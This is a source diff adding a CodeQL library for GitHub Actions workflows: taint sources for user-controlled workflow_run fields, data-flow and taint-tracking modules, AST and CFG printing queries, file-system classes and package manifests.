exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +private class EventSource extends RemoteFlowSource { + EventSource() { + exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) + ) + } + + override string getSourceType() { result = "User-controlled events" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll new file mode 100644 index 00000000000..528f9e54832 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -0,0 +1,31 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesExpr u | + u.getTarget() = "mad9000/actions-find-and-replace-string" and + pred.asExpr() = u.getArgument(["source", "replace"]) and + succ.asExpr() = u + ) + } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll new file mode 100644 index 00000000000..4abb455b0dd --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -0,0 +1,11 @@ +/** + * Provides Actions-specific definitions for use in the data flow library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/DataFlow.qll + */ + +private import codeql.dataflow.DataFlow + +module ActionsDataFlow implements InputSig { + import DataFlowPrivate + import DataFlowPublic +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll new file mode 100644 index 00000000000..b4abb3e8aa5 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -0,0 +1,312 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import codeql.actions.controlflow.BasicBlocks +private import DataFlowPublic + +cached +newtype TNode = TExprNode(DataFlowExpr e) + +/** + * Not used + */ +class ParameterNode extends Node { + ParameterNode() { none() } +} + +/** + * Not used + */ +class ReturnNode extends Node { + ReturnNode() { none() } + + ReturnKind getKind() { none() } +} + +class OutNode extends ExprNode { + private DataFlowCall call; + + OutNode() { call = this.getCfgNode() } + + DataFlowCall getCall(ReturnKind kind) { + result = call and + kind instanceof NormalReturn + } +} + +class CastNode extends Node { + CastNode() { none() } +} + +class PostUpdateNode extends Node { + PostUpdateNode() { none() } + + Node getPreUpdateNode() { none() } +} + +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } + +predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { + arg.argumentOf(call, pos) +} + +DataFlowCallable nodeGetEnclosingCallable(Node node) { + node = TExprNode(any(DataFlowExpr e | result = e.getScope())) +} + +DataFlowType getNodeType(Node node) { any() } + +predicate nodeIsHidden(Node node) { none() } + +class DataFlowExpr extends Cfg::Node { + DataFlowExpr() { this.getAstNode() instanceof Expression } +} + +/** + * A call corresponds to a Uses steps where a 3rd party action gets called + */ +class DataFlowCall instanceof Cfg::Node { + DataFlowCall() { super.getAstNode() instanceof UsesExpr } + + /** Gets a textual representation of this element. */ + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + + DataFlowCallable getEnclosingCallable() { result = super.getScope() } +} + +// class DataFlowCallable instanceof Cfg::CfgScope { +// DataFlowCallable() { none() } +// +// string toString() { result = super.toString() } +// +// string getName() { result = "none" } +// } +/** + * A Cfg scope that can be called + * There are no callables in Actions, at least not in the AST + */ +class DataFlowCallable instanceof Cfg::CfgScope { + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { + if this instanceof StepStmt + then result = this.(StepStmt).getName() + else result = this.(JobStmt).getName() + } +} + +newtype TReturnKind = TNormalReturn() + +abstract class ReturnKind extends TReturnKind { + /** Gets a textual representation of this element. */ + abstract string toString(); +} + +class NormalReturn extends ReturnKind, TNormalReturn { + override string toString() { result = "return" } +} + +/** Gets a viable implementation of the target of the given `Call`. */ +DataFlowCallable viableCallable(DataFlowCall c) { none() } + +// /** +// * Holds if the set of viable implementations that can be called by `call` +// * might be improved by knowing the call context. +// */ +// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } +// /** +// * Gets a viable dispatch target of `call` in the context `ctx`. This is +// * restricted to those `call`s for which a context might make a difference. +// */ +// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } +/** + * Gets a node that can read the value returned from `call` with return kind + * `kind`. + */ +OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) { call = result.getCall(kind) } + +private newtype TDataFlowType = TUnknownDataFlowType() + +/** + * A type for a data flow node. + * + * This may or may not coincide with any type system existing for the source + * language, but should minimally include unique types for individual closure + * expressions (typically lambdas). + */ +class DataFlowType extends TDataFlowType { + string toString() { result = "" } +} + +string ppReprType(DataFlowType t) { none() } + +bindingset[t1, t2] +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } + +predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } + +private newtype TContent = TNoContent() { none() } + +class Content extends TContent { + /** Gets a textual representation of this element. */ + string toString() { none() } +} + +predicate forceHighPrecision(Content c) { none() } + +newtype TContentSet = TNoContentSet() { none() } + +private newtype TContentApprox = TNoContentApprox() { none() } + +class ContentApprox extends TContentApprox { + /** Gets a textual representation of this element. */ + string toString() { none() } +} + +ContentApprox getContentApprox(Content c) { none() } + +/** + * Not used since we dont have Callables in the AST + * Made a string to match the ArgumentPosition type + */ +class ParameterPosition extends string { + ParameterPosition() { none() } +} + +/** + * Made a string to match `With:` keys in the AST + */ +class ArgumentPosition extends string { + ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } +} + +/** + * Not really used since we dont have Callables in the AST but needed for the InputSig signature + */ +predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } + +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(UsesExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + +predicate test1(UsesExpr u, string f, JobStmt j) { + u.getLocation().getFile().getBaseName() = "inter1.yml" and + f = u.getId() and + j = u.getJob() +} + +predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + f = r.getStepId() and + j = r.getJob() +} + +predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getId() = r.getStepId() and + u.getJob() = r.getJob() and + // el SOAE has no mapping DF NODE + n.asExpr() = r +} + +predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression + exists(Expression astFrom, JobOutputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getOutputExpr() = astFrom + ) +} + +/** + * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. + * For Actions, we dont need SSA nodes since it should be already in SSA form + * Local flow steps are always between two nodes in the same Cfg scope (job definition). + */ +pragma[nomagic] +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) +} + +/** + * Holds if data can flow from `node1` to `node2` through a non-local step + * that does not follow a call edge. For example, a step through a global + * variable. + */ +predicate jumpStep(Node node1, Node node2) { none() } + +/** + * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, + * `node1` references an object with a content `c.getAReadContent()` whose + * value ends up in `node2`. + */ +predicate readStep(Node node1, ContentSet c, Node node2) { none() } + +/** + * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, + * `node2` references an object with a content `c.getAStoreContent()` that + * contains the value of `node1`. + */ +predicate storeStep(Node node1, ContentSet c, Node node2) { none() } + +/** + * Holds if values stored inside content `c` are cleared at node `n`. For example, + * any value stored inside `f` is cleared at the pre-update node associated with `x` + * in `x.f = newValue`. + */ +predicate clearsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the value that is being tracked is expected to be stored inside content `c` + * at node `n`. + */ +predicate expectsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the node `n` is unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } + +/** + * Holds if flow is allowed to pass from parameter `p` and back to itself as a + * side-effect, resulting in a summary from `p` to itself. + * + * One example would be to allow flow like `p.foo = p.bar;`, which is disallowed + * by default as a heuristic. + */ +predicate allowParameterReturnInSelf(ParameterNode p) { none() } + +predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +private newtype TLambdaCallKind = TNone() + +class LambdaCallKind = TLambdaCallKind; + +/** Holds if `creation` is an expression that creates a lambda of kind `kind` for `c`. */ +predicate lambdaCreation(Node creation, LambdaCallKind kind, DataFlowCallable c) { none() } + +/** Holds if `call` is a lambda call of kind `kind` where `receiver` is the lambda expression. */ +predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { none() } + +/** Extra data-flow steps needed for lambda flow analysis. */ +predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll new file mode 100644 index 00000000000..41be90718d8 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -0,0 +1,78 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import DataFlowPrivate + +class Node extends TNode { + /** Gets a textual representation of this element. */ + string toString() { none() } + + Location getLocation() { none() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } + + AstNode asExpr() { none() } +} + +/** + * Any Ast Expression + * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... + */ +class ExprNode extends Node, TExprNode { + private DataFlowExpr expr; + + ExprNode() { this = TExprNode(expr) } + + Cfg::Node getCfgNode() { result = expr } + + override string toString() { result = expr.toString() } + + override Location getLocation() { result = expr.getLocation() } + + override AstNode asExpr() { result = expr.getAstNode() } +} + +/** + * An argument to a Uses step (call) + */ +class ArgumentNode extends ExprNode { + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + + predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { + this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + call.(Cfg::Node).getAstNode() = + any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + } +} + +/** Gets the node corresponding to `e`. */ +Node exprNode(DataFlowExpr e) { result = TExprNode(e) } + +/** + * An entity that represents a set of `Content`s. + * + * The set may be interpreted differently depending on whether it is + * stored into (`getAStoreContent`) or read from (`getAReadContent`). + */ +class ContentSet extends TContentSet { + /** Gets a textual representation of this element. */ + string toString() { none() } + + /** Gets a content that may be stored into when storing into this set. */ + Content getAStoreContent() { none() } + + /** Gets a content that may be read from when reading from this set. */ + Content getAReadContent() { none() } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll new file mode 100644 index 00000000000..c2d51748f20 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -0,0 +1,11 @@ +/** + * Provides Actions-specific definitions for use in the taint tracking library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll + */ + +private import codeql.dataflow.TaintTracking +private import DataFlowImplSpecific + +module ActionsTaintTracking implements InputSig { + import TaintTrackingPrivate +} diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll new file mode 100644 index 00000000000..a7e0d23df2b --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -0,0 +1,30 @@ +/** + * Provides modules for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ + +private import DataFlowPrivate +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.Ast + +/** + * Holds if `node` should be a sanitizer in all global taint flow configurations + * but not in local taint. + */ +predicate defaultTaintSanitizer(DataFlow::Node node) { none() } + +/** + * Holds if the additional step from `nodeFrom` to `nodeTo` should be included + * in all global taint flow configurations. + */ +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +} + +/** + * Holds if taint flow configurations should allow implicit reads of `c` at sinks + * and inputs to additional taint steps. + */ +bindingset[node] +predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() } diff --git a/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll new file mode 100644 index 00000000000..90ce11764b5 --- /dev/null +++ b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll @@ -0,0 +1,19 @@ +private import codeql.files.FileSystem + +/** + * Returns an appropriately encoded version of a filename `name` + * passed by the VS Code extension in order to coincide with the + * output of `.getFile()` on locatable entities. + */ +cached +File getFileBySourceArchiveName(string name) { + // The name provided for a file in the source archive by the VS Code extension + // has some differences from the absolute path in the database: + // 1. colons are replaced by underscores + // 2. there's a leading slash, even for Windows paths: "C:/foo/bar" -> + // "/C_/foo/bar" + // 3. double slashes in UNC prefixes are replaced with a single slash + // We can handle 2 and 3 together by unconditionally adding a leading slash + // before replacing double slashes. + name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/") +} \ No newline at end of file diff --git a/ql/lib/codeql/actions/ideContextual/printAst.qll b/ql/lib/codeql/actions/ideContextual/printAst.qll new file mode 100644 index 00000000000..f8a7c16f071 --- /dev/null +++ b/ql/lib/codeql/actions/ideContextual/printAst.qll @@ -0,0 +1,137 @@ +/** + * Provides queries to pretty-print an Kaleidoscope abstract syntax tree as a graph. + * + * By default, this will print the AST for all nodes in the database. To change + * this behavior, extend `PrintASTConfiguration` and override `shouldPrintNode` + * to hold for only the AST nodes you wish to view. + */ + +private import codeql.actions.Ast +private import codeql.Locations + +/** + * The query can extend this class to control which nodes are printed. + */ +class PrintAstConfiguration extends string { + PrintAstConfiguration() { this = "PrintAstConfiguration" } + + /** + * Holds if the given node should be printed. + */ + predicate shouldPrintNode(PrintAstNode n) { any() } +} + +newtype TPrintNode = TPrintRegularAstNode(AstNode n) { any() } + +private predicate shouldPrintNode(PrintAstNode n) { + any(PrintAstConfiguration config).shouldPrintNode(n) +} + +/** + * A node in the output tree. + */ +class PrintAstNode extends TPrintNode { + /** Gets a textual representation of this node in the PrintAst output tree. */ + string toString() { none() } + + /** + * Gets the child node with name `edgeName`. Typically this is the name of the + * predicate used to access the child. + */ + PrintAstNode getChild(string edgeName) { none() } + + /** Get the Location of this AST node */ + Location getLocation() { none() } + + /** Gets a child of this node. */ + final PrintAstNode getAChild() { result = this.getChild(_) } + + /** Gets the parent of this node, if any. */ + final PrintAstNode getParent() { result.getAChild() = this } + + /** Gets a value used to order this node amongst its siblings. */ + int getOrder() { + this = + rank[result](PrintRegularAstNode p, Location l, File f | + l = p.getLocation() and + f = l.getFile() + | + p + order by + f.getBaseName(), f.getAbsolutePath(), l.getStartLine(), l.getStartColumn(), + l.getEndLine(), l.getEndColumn() + ) + } + + /** + * Gets the value of the property of this node, where the name of the property + * is `key`. + */ + final string getProperty(string key) { + key = "semmle.label" and + result = this.toString() + or + key = "semmle.order" and result = this.getOrder().toString() + } +} + +/** An `AstNode` in the output tree. */ +class PrintRegularAstNode extends PrintAstNode, TPrintRegularAstNode { + AstNode astNode; + + PrintRegularAstNode() { this = TPrintRegularAstNode(astNode) } + + override string toString() { + result = "[" + concat(astNode.getAPrimaryQlClass(), ", ") + "] " + astNode.toString() + } + + override Location getLocation() { result = astNode.getLocation() } + + override PrintAstNode getChild(string name) { + exists(int i | + name = i.toString() and + result = + TPrintRegularAstNode(rank[i](AstNode child, Location l | + child.getParentNode() = astNode and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), + child.toString() + )) + ) + } +} + +/** + * Holds if `node` belongs to the output tree, and its property `key` has the + * given `value`. + */ +query predicate nodes(PrintAstNode node, string key, string value) { + value = node.getProperty(key) and shouldPrintNode(node) +} + +/** + * Holds if `target` is a child of `source` in the AST, and property `key` of + * the edge has the given `value`. + */ +query predicate edges(PrintAstNode source, PrintAstNode target, string key, string value) { + shouldPrintNode(source) and + shouldPrintNode(target) and + target = source.getChild(_) and + ( + key = "semmle.label" and + value = strictconcat(string name | source.getChild(name) = target | name, "/") + or + key = "semmle.order" and + value = target.getProperty("semmle.order") + ) +} + +/** + * Holds if property `key` of the graph has the given `value`. + */ +query predicate graphProperties(string key, string value) { + key = "semmle.graphKind" and value = "tree" +} diff --git a/ql/lib/codeql/files/FileSystem.qll b/ql/lib/codeql/files/FileSystem.qll new file mode 100644 index 00000000000..552b85a4673 --- /dev/null +++ b/ql/lib/codeql/files/FileSystem.qll @@ -0,0 +1,177 @@ +/** Provides classes for working with files and folders. */ + +private import codeql.Locations + +/** A file or folder. */ +abstract class Container extends @container { + /** Gets a file or sub-folder in this container. */ + Container getAChildContainer() { this = result.getParentContainer() } + + /** Gets a file in this container. */ + File getAFile() { result = this.getAChildContainer() } + + /** Gets a sub-folder in this container. */ + Folder getAFolder() { result = this.getAChildContainer() } + + /** + * Gets the absolute, canonical path of this container, using forward slashes + * as path separator. + * + * The path starts with a _root prefix_ followed by zero or more _path + * segments_ separated by forward slashes. + * + * The root prefix is of one of the following forms: + * + * 1. A single forward slash `/` (Unix-style) + * 2. An upper-case drive letter followed by a colon and a forward slash, + * such as `C:/` (Windows-style) + * 3. Two forward slashes, a computer name, and then another forward slash, + * such as `//FileServer/` (UNC-style) + * + * Path segments are never empty (that is, absolute paths never contain two + * contiguous slashes, except as part of a UNC-style root prefix). Also, path + * segments never contain forward slashes, and no path segment is of the + * form `.` (one dot) or `..` (two dots). + * + * Note that an absolute path never ends with a forward slash, except if it is + * a bare root prefix, that is, the path has no path segments. A container + * whose absolute path has no segments is always a `Folder`, not a `File`. + */ + abstract string getAbsolutePath(); + + /** + * Gets the base name of this container including extension, that is, the last + * segment of its absolute path, or the empty string if it has no segments. + * + * Here are some examples of absolute paths and the corresponding base names + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + * + *
Absolute pathBase name
"/tmp/tst.go""tst.go"
"C:/Program Files (x86)""Program Files (x86)"
"/"""
"C:/"""
"D:/"""
"//FileServer/"""
+ */ + string getBaseName() { + result = this.getAbsolutePath().regexpCapture(".*/(([^/]*?)(?:\\.([^.]*))?)", 1) + } + + /** + * Gets the extension of this container, that is, the suffix of its base name + * after the last dot character, if any. + * + * In particular, + * + * - if the name does not include a dot, there is no extension, so this + * predicate has no result; + * - if the name ends in a dot, the extension is the empty string; + * - if the name contains multiple dots, the extension follows the last dot. + * + * Here are some examples of absolute paths and the corresponding extensions + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathExtension
"/tmp/tst.go""go"
"/tmp/.classpath""classpath"
"/bin/bash"not defined
"/tmp/tst2."""
"/tmp/x.tar.gz""gz"
+ */ + string getExtension() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(\\.([^.]*))?", 3) + } + + /** Gets the file in this container that has the given `baseName`, if any. */ + File getFile(string baseName) { + result = this.getAFile() and + result.getBaseName() = baseName + } + + /** Gets the sub-folder in this container that has the given `baseName`, if any. */ + Folder getFolder(string baseName) { + result = this.getAFolder() and + result.getBaseName() = baseName + } + + /** Gets the parent container of this file or folder, if any. */ + Container getParentContainer() { containerparent(result, this) } + + /** + * Gets the relative path of this file or folder from the root folder of the + * analyzed source location. The relative path of the root folder itself is + * the empty string. + * + * This has no result if the container is outside the source root, that is, + * if the root folder is not a reflexive, transitive parent of this container. + */ + string getRelativePath() { + exists(string absPath, string pref | + absPath = this.getAbsolutePath() and sourceLocationPrefix(pref) + | + absPath = pref and result = "" + or + absPath = pref.regexpReplaceAll("/$", "") + "/" + result and + not result.matches("/%") + ) + } + + /** + * Gets the stem of this container, that is, the prefix of its base name up to + * (but not including) the last dot character if there is one, or the entire + * base name if there is not. + * + * Here are some examples of absolute paths and the corresponding stems + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathStem
"/tmp/tst.go""tst"
"/tmp/.classpath"""
"/bin/bash""bash"
"/tmp/tst2.""tst2"
"/tmp/x.tar.gz""x.tar"
+ */ + string getStem() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(?:\\.([^.]*))?", 1) + } + + /** + * Gets a URL representing the location of this container. + * + * For more information see https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/#providing-urls. + */ + abstract string getURL(); + + /** + * Gets a textual representation of the path of this container. + * + * This is the absolute path of the container. + */ + string toString() { result = this.getAbsolutePath() } +} + +/** A folder. */ +class Folder extends Container, @folder { + override string getAbsolutePath() { folders(this, result) } + + /** Gets the URL of this folder. */ + override string getURL() { result = "folder://" + this.getAbsolutePath() } +} + +/** A file. */ +class File extends Container, @file { + override string getAbsolutePath() { files(this, result) } + + /** Gets the URL of this file. */ + override string getURL() { result = "file://" + this.getAbsolutePath() + ":0:0:0:0" } + + /** Holds if this file was extracted from ordinary source code. */ + predicate fromSource() { any() } +} diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml new file mode 100644 index 00000000000..df2fe6e3734 --- /dev/null +++ b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml @@ -0,0 +1,39 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +inProgress: + primaryLanguage: yaml + installedExtractors: + go: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go + python: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python + java: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java + html: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html + xml: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml + properties: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties + cpp: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp + swift: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift + csv: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv + yaml: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml + csharp: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp + javascript: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript + ruby: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby +creationMetadata: + cliVersion: 2.16.0 + creationTime: 2024-02-02T10:02:02.082819Z +finalised: false diff --git a/ql/lib/ide-contextual-queries/printAst.ql b/ql/lib/ide-contextual-queries/printAst.ql new file mode 100644 index 00000000000..9effce3721f --- /dev/null +++ b/ql/lib/ide-contextual-queries/printAst.ql @@ -0,0 +1,29 @@ +/** + * @name Print AST + * @description Produces a representation of a file's Abstract Syntax Tree. + * This query is used by the VS Code extension. + * @id actions/print-ast + * @kind graph + * @tags ide-contextual-queries/print-ast + */ + +private import codeql.actions.ideContextual.IDEContextual +import codeql.actions.ideContextual.printAst +private import codeql.actions.Ast + +/** + * The source file to generate an AST from. + */ +external string selectedSourceFile(); + +/** + * A configuration that only prints nodes in the selected source file. + */ +class Cfg extends PrintAstConfiguration { + override predicate shouldPrintNode(PrintAstNode n) { + super.shouldPrintNode(n) and + n instanceof PrintRegularAstNode and + n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile()) + } +} + diff --git a/ql/lib/ide-contextual-queries/printCfg.ql b/ql/lib/ide-contextual-queries/printCfg.ql new file mode 100644 index 00000000000..d4a90f87f92 --- /dev/null +++ b/ql/lib/ide-contextual-queries/printCfg.ql @@ -0,0 +1,53 @@ +/** + * @name Print CFG + * @description Produces a representation of a file's Control Flow Graph. + * This query is used by the VS Code extension. + * @id actions/print-cfg + * @kind graph + * @tags ide-contextual-queries/print-cfg + */ + + private import codeql.actions.Cfg + private import codeql.actions.Cfg::TestOutput + private import codeql.actions.ideContextual.IDEContextual + private import codeql.Locations + + /** + * Gets the source file to generate a CFG from. + */ + external string selectedSourceFile(); + + external string selectedSourceLine(); + + external string selectedSourceColumn(); + + bindingset[file, line, column] + private CfgScope smallestEnclosingScope(File file, int line, int column) { + result = + min(Location loc, CfgScope scope | + loc = scope.getLocation() and + ( + loc.getStartLine() < line + or + loc.getStartLine() = line and loc.getStartColumn() <= column + ) and + ( + loc.getEndLine() > line + or + loc.getEndLine() = line and loc.getEndColumn() >= column + ) and + loc.getFile() = file + | + scope + order by + loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn() + ) + } + + class MyRelevantNode extends RelevantNode { + MyRelevantNode() { + this.getScope() = + smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()), + selectedSourceLine().toInt(), selectedSourceColumn().toInt()) + } + } diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo new file mode 100644 index 00000000000..c77f7924c12 --- /dev/null +++ b/ql/lib/qlpack.gbo @@ -0,0 +1,13 @@ +--- +warnOnImplicitThis: false +name: seclab/actions-all +version: 0.0.1-dev +groups: actions +extractor: actions +library: true +tests: test +dependencies: + codeql/javascript-all: ^0.8.7 + "codeql/controlflow": "*" + "codeql/dataflow": "*" + "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml new file mode 100644 index 00000000000..325c63f4625 --- /dev/null +++ b/ql/lib/qlpack.yml @@ -0,0 +1,15 @@ +--- +library: true +warnOnImplicitThis: true +name: codeql/actions-all +version: 0.0.1-dev +dependencies: + codeql/controlflow: ^0.1.7 + codeql/yaml: '*' + codeql/util: '*' + codeql/dataflow: ^0.1.7 +dbscheme: yaml.dbscheme +extractor: yaml +tests: test +groups: + - yaml diff --git a/ql/lib/test-db/baseline-info.json b/ql/lib/test-db/baseline-info.json new file mode 100644 index 00000000000..9e26dfeeb6e --- /dev/null +++ b/ql/lib/test-db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/ql/lib/test-db/codeql-database.yml b/ql/lib/test-db/codeql-database.yml new file mode 100644 index 00000000000..887a8daf4c1 --- /dev/null 